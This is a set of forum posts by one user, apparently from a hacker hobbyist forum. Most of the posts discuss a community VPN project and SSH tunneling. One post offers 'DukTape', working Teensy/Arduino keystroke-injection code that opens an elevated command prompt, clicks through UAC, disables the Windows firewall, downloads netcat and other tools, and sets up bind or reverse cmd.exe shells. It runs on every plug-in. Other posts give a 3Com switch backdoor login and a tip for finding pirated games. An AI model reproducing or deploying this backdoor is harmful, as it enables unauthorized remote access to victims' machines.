str33ts0ld13r

I haven't had any problems with it. Ill put a yes vote in.

Greetings ducky lovers! Im very excited to finally be making a contribution to the rubber ducky project. To get started you will need arduino and the phukdlib. DukTape is nothing fancy (pun intended ). It will get you wget and a few other toys like nc then it opens a back door for you to get in. When complete it blinks (big surprise right!! haha) There is MUCH room for improvement on this but I sadly haven't had time to work on this as much as I would like.. Anyway I wanted to share what I have put together so far. Please feel free to modify, add, change what ever you like in this code. All that I ask is that you post you changes for the rest of the ducky community. As always constructive criticism is welcome and appreciated. Warning: I have NOT had a chance to test this code with my teensy yet (had some hardware failure on my test boxes :( ). But it compiles fine for me. Warning2: I haven't set up a kill switch feature yet to keep it from running on systems you dont want it to (ie your own system). So you have been warned, it runs every time you plug it in! UPDATE: I just added a UAC handler and changed the way the cmd is launched to go through the start menu using ctrl and esc keys. (thanks H@L0_F00 for the ctrl esc combo you posted) and (thanks Jonny_Walked I used some of the code you posted, UAC handler, and used your cmd launcher)(If this code was Benownzu93's I thank you). Also the PHUCKED lib is no longer needed with the updated cmd launcher. /* ################################ ###########DukTape############## ################################ Readme: To use DukTape make sure you have the phukdlib installed in arduino. I would like to thank everyone on the Rubber Ducky forums http://www.hak5.org/forums/index.php?showforum=56 who I borrowed ideas and code from. Debug is done through the serial monitor. To disable it comment out/remove the code marked as debug (ie.. //debug). Delays may need to be adjusted... */ int ledPin = 11; void setup() { delay(5000); //initial delay pinMode(ledPin, OUTPUT); Serial.begin(9600); //debug delay(200); //debug Serial.println("START");//debug //start cmd hidden CMD(); delay(1000); MoveWin(); //prepare work area TypeCmd("mkdir %systemroot%\\winduk"); TypeCmd("cd %systemroot%\\winduk"); TypeCmd("netsh firewall set opmode disable");//kill firewall //ftp download wget TypeCmd("echo bin >>ftpcmd.txt"); TypeCmd("echo cd /tex-archive/systems/texlive/tlnet/tlpkg/installer/wget/ >>ftpcmd.txt"); TypeCmd("echo get wget.exe >>ftpcmd.txt"); TypeCmd("echo quit >>ftpcmd.txt"); TypeCmd("ftp -A -v -s:ftpcmd.txt cam.ctan.org"); //run ftp download delay(6000); TypeCmd("if NOT exist wget.exe ftp -A -v -s:ftpcmd.txt cam.ctan.org");//error recovery in case of wget download fail Serial.println("Ftp completed");//debug //Get more tools TypeCmd("if NOT exist unzip.exe wget -q http://stahlworks.com/dev/unzip.exe"); //get unzip TypeCmd("if NOT exist nircmd.zip wget -q http://www.nirsoft.net/utils/nircmd.zip");//get nircmd TypeCmd("if NOT exist nircmdc.exe unzip.exe -qq nircmd.zip"); //unzip nircmd TypeCmd("if NOT exist nc111nt.zip wget -q http://joncraton.org/media/files/nc111nt.zip"); //get netcat TypeCmd("if NOT exist nc.exe unzip.exe -qq nc111nt.zip nc.exe");//unzip netcat //Payload //TypeCmd("nc -l -p 1337 -d -e cmd.exe");//netcat listens on port leet and launches cmd when a connection is established /*TypeCmd("nc -d IP PORT -e cmd.exe");/*reverse netcat replace IP with your ipaddress and replace PORT with the port you use on the system you want to connect back to, run "nc -l -p PORT" without the quotes on your system to accept the reverse connection*/ //clean up TypeCmd("if Exist nircmdc.exe del /Q nircmd.zip"); TypeCmd("if EXIST ftpcmd.txt del /Q ftpcmd.txt"); TypeCmd("if EXIST nc111nt.zip del /Q nc111nt.zip"); TypeCmd("exit");//close cmd. Serial.println("ALL DONE!");//debug } void loop() { digitalWrite(ledPin, HIGH);// LED on delay(500); digitalWrite(ledPin, LOW);// LED off delay(500); } void Enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(100); } void TypeCmd(char *commandtotype) { //must have cmd prompt open to work Keyboard.println("*commandtotype"); delay(200); Enter(); delay(2000);//Execution delay Serial.println("*commandtotype");//debug } void MoveWin() { Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_SPACE); Keyboard.set_key2(KEY_M); Keyboard.send_now(); delay(50); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.send_now(); delay(50); for(int x=0; x<200; ++x){ Keyboard.set_key1(KEY_UP); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); delay(100); } Enter(); } void UAC() { Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_Y); Keyboard.send_now(); delay(100); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } void CMD() { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_ESC); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.print("cmd"); delay(1000); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(2000); UAC(); }

I want to give a huge thanks to Darren for the ducky kit!! mine showed up today. The mail actually delivered it to the next street over but the guy that lives there brought it over! maybe I should head to the casino with luck like this

Got signed up, been waiting about 10 hours for this lol. Hope I make the cut, and didn't stay up for 24 hours for nothing lol. Good luck to everyone else too. Im really happy to see so much support for this so quickly!! Now its time to take a nap..

that's a sweet setup. especially the duel wan.. however i don't think that the tucked away to look normal concept really works (its ok though i still tuck mine away to look normal too, although it really doesn't work for me neither lol).

get a new os...

thats sweet man. ive been playing with it in a VM for a few hours. i haven't had any problems with it. a few suggestions i could make would be to add cain & able (i know its a tool that is looked down upon but there is no denying that it dose have a lot of useful features) maybe wireshark. i like how the UI is real simple and not cluttered with things that you dont need. im really looking forward to the future releases! if i can help with anything pm me.

hell they dont need to put cameras or mic's in anyone's house we all put them there for them. ie cell phone regular phone web cam plus there are the billions of security / traffic cams they have.. they can tap everything anyway....

damn i hate being broke.. i always like picking up new equipment...

or you can always go with game name filetype:torrent in a google search. makes things real nice and fast.

you can just get a free shell account from somewhere that allows ssh (most do) and tunnel through that. what i use for my tunnels is my hp server LC2000 (i know its ancient but it works for me plus it was free). you always do have the option of just taking one of the junk computers you probably have laying around and putting linux on it. ubuntu is really really easy to set up, then just connect it to your network and run it headless. thats usually a cheap way. if you dont have a crapo machine laying around, garage sales are usually a good place to find one.

so are we going to get back on topic or what people?

where the hell is this thing legal for free. i ran tor through like 30 different countries and the best i could find is access to the premium one....

all very good videos ive had them for quite a while and watch them regularly.

starchfish: for the 3com firmware 7.0.1 and 8.1.1 (you should be able to get the firmware here if you dont have it infodeli.3com.com) there is a back door login of debug with the password synnet just telnet in. its a major security flaw that they put in that you should probably fix once you get your switches back up..

exactly the way i feel is if they are willing to lean i dont mind helping them. but ya we all have those people that we cant stand.. yours is steve jobs mine is pretty much all sys-admin/IT departments but the one that we can all agree on are those little internet punks.. (im sure im gonna get flamed for that IT comment (for all you flamers the key words in that sentence were "pretty much"))

ya skiddies are a pain in the ass (i mean ill defend noobs because they haven't had the chance to lean yet but skiddies don't want to learn.). i like the invite only thing a registration would be one of the best security measures we could take. (note:everyone who helps contribute to this project will have access to the hak5 vpn before anyone else is invited). registrations will be included in this thank you for that input Swathe. that would be sweet. encryption is always good.. sorry to everyone i haven't been able to do as much with this project as i would like. i have a few other projects that have been taking up a considerable amount of my time, but not to worry those projects are just about wrapped up and i will be able to focus more of my time to this. i hope to really get things moving on this in the next week or so. now to just make sure everyone is in agreement, we are going with openvpn....?..

ok first off you dont have to port forward your router unless you are connecting to your lan from the outside internet (ie.. coffee shop wifi connection back through your router to you ssh server). what client are you using? are you trying to run your sshd on your laptop and connect to it through the loopback adapter (ie.. 127.0.0.1) or are you running your sshd on a separate machine?

that would be pretty sweet to add any features that hamachi has that openvpn is missing. if you can code that would be great, im not much good when it comes to coding. what were you thinking of adding?? thats why we have to find a way to make it as secure as possible, your only line of defense shouldnt be your router firewall. i agree that there are a lot of security risks involved and that is one of my main concerns.. seeing as how it has come up before there is an interest in it, and i think that there is a way to make it work securely.

damn i dont know how you do it iisonly... i dont even have enough time to read all the things i need to and i dont even subscribe to any rss feeds... i agree legend.. and kudos

to be perfectly honest i have never done anything with a vpn before this. but the way i feel is that people need to learn things and shouldn't use a weaker product because its easier. plus this will be a community project so there will be plenty of help for people that have question. well speed is key especial with gaming. thank you bit hunter for that information. control over your connections is important when it comes to security. i think that with everything that we know now we should go with openvpn. plus there is the fact that the hak5 crew are suppose to feature somethings on it in a future ep. sense this is a community project i created a new thread in projects>community projects labeled Hak5 vpn (link to it http://hak5.org/forums/index.php?showtopic=11914) so lets move all discussion over there.

i started this thread to move discussion of the hak5 vpn out of the questions section where it started. i will update this first post with all the information that is needed for this project. please make your comments in this thread instead of the thread in questions.

obviously you want to use multiple layers of cryptography and hidden volumes for your data but there needs to be a legit reason for your data being there and consuming that much space. as SomethingToChatWith said it by renaming it a doc file it wont open in simple editors but if your going through this much work already your opponent wont be using wordpad. the answer to this is rare formats that consume lots and lots of space. and you can always hide it in a .rar file then tuck then in an iso or something.. encryption is just a game of hide and seek.

gaming over the vpn is one of my biggest interests, well that and security. i think the choice is going to come down to Hamachi and openvpn. i did hear openvpn mentioned in the show today, during the firewall section.

ok all ive been doing some research on all of this ive come across 2 other projects besides leaf the first is called hamachi which buzzinh showed me and the other one is openvpn. here are the links to the info on all the vpns leaf networks the main site is posted earlier in the forum http://techie-buzz.com/online-goodies/leaf...y-hardware.html is a article i found on it (there is not much good information on it out there) hamachi https://secure.logmein.com/products/hamachi/vpn.asp?lang=en is the main site http://en.wikipedia.org/wiki/Hamachi openvpn http://openvpn.net/ http://en.wikipedia.org/wiki/OpenVPN i would like to know what everyone thinks would be best. by the way i would really like to see more people get involved with creating the hak5 vpn so let us know what you think